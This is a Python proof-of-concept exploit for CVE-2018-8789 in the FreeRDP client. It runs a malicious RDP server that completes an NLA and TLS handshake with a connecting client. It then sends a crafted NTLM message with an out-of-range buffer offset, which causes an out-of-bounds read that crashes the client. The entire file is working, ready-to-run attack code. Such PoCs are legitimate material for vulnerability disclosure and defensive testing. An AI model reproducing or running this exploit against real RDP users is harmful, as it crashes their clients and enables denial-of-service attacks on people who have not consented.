import socket
import struct
import sys
import ssl
from elementals import Prompter

##########################
## PoC Config Variables ##
##########################

VULN_ID 	= "CVE-2018-8789"
PRODUCT_ID 	= "FreeRDP"
VULN_DESC 	= "Out-Of-Bounds Read, leading to a DoS"

#################
## RDP Configs ##
#################

RDP_PORT 		= 3389

CERT_FILE_NAME 	= "selfsigned.crt"
KEY_FILE_NAME  	= "private_no_pass.key"

def send_NTLM_DoS() :
	pre_packet  = '\x30\x82' + '\x01\x02'
	packet  = '\xa0\x03\x02\x01\x02\xa1\x81\xfa' + '\x30\x81\xf7\x30\x81\xf4\xa0\x81'
	packet += '\xf1\x04\x81\xee\x4e\x54\x4c\x4d' + '\x53\x53\x50\x00\x02\x00\x00\x00'
	packet += struct.pack("!H", 0x8000) 	# len
	packet += struct.pack("!H", 0x1E00) 	# maxlen
	packet += struct.pack("!L", 0x80FFFFFF) # bufferOffset
	packet += '\x35\x82\x8a\xe2\xf9\x64\x2f\x64'
	packet += '9' * (13 * 16 + 2)
	return pre_packet + packet

def sendProtocolNLA(sock) :
	"""Declaring we only support NLA Authentication
	
	Args:
		sock (socket): socket with the connected client
	"""
	protocol  = '\x03\x00' + '\x00\x13'
	protocol += '\x0e\xd0\x00\x00\x12\x34\x00\x02\x01\x08\x00\x02\x00\x00\x00'
	sock.send(protocol)

def startPoC(local_ip, logger) :
	"""Contains the full logic for the presented PoC
	
	Args:
		local_ip (ip): ip address as a string
		logger (logger): elementals logger instance	
	"""
	logger.info("Creating the malicious RDP server on IP: %s", local_ip)
	server_sock = socket.socket()
	server_sock.bind((local_ip, RDP_PORT))
	server_sock.listen(5)	
	logger.info("Waiting to attack a vulnerable FreeRDP client that will connect to us")
	# Accepting a new client
	client_sock, client_addr = server_sock.accept()
	logger.info("Accepted a client from IP: %s", client_addr[0])
	# Starting the RDP protocol
	logger.info("Starting the attack")
	logger.addIndent()
	# We only support NLA
	logger.info("Preforming the handshake for security authentication (NLA)")
	rdp_neg = client_sock.recv(64)
	sendProtocolNLA(client_sock)
	# Add the TLS Layer
	ssl_sock = ssl.wrap_socket(client_sock,
							 server_side = True, 
							 certfile = CERT_FILE_NAME,
							 keyfile  = KEY_FILE_NAME,
							 ssl_version = ssl.PROTOCOL_TLSv1)
	# Receive some messages from the client
	ignored_data = ssl_sock.recv(1024)
	# Send him our crafted message
	logger.info("Sending the PoC message to trigger a read access violation (DoS)")
	ssl_sock.send(send_NTLM_DoS())
	logger.removeIndent()

def showDetails(logger) :
	"""Prints the basic details of the vulnerability we PoC
	
	Args:
		logger (logger): elementals logger instance	
	"""
	logger.info("Starting the PoC Script for %s", VULN_ID)
	logger.addIndent()
	logger.info("Product: %s", PRODUCT_ID)
	logger.info("Vulnerability: %s", VULN_DESC)
	logger.removeIndent()
	
def printUsage(args) :
	"""Prints usage instructions for this file
	
	Args:
		args (list):  list of cmd line arguments
	"""
	print 'Usage: %s <local ip address>' % (args[0])
	print 'Exiting'
	exit(1)

##
# Main Function for the PoC Script
##
def main(args) :
	# We should get only 1 argument
	if len(args) != 1 + 1 :
		print 'Wrong amount of arguments, got %d while exepected %d' % (len(args) - 1, 1)
		printUsage(args)
	
	# Parse the arguments
	local_ip = args[1]		
	# Create the prompter
	prompter = Prompter("%s PoC" % (PRODUCT_ID), [])
	# Show the PoC's meta-data
	showDetails(prompter)
	# Here we start	
	startPoC(local_ip, prompter)
	# Finished
	prompter.info("Finished Successfully")	

if __name__ == "__main__":
	main(sys.argv)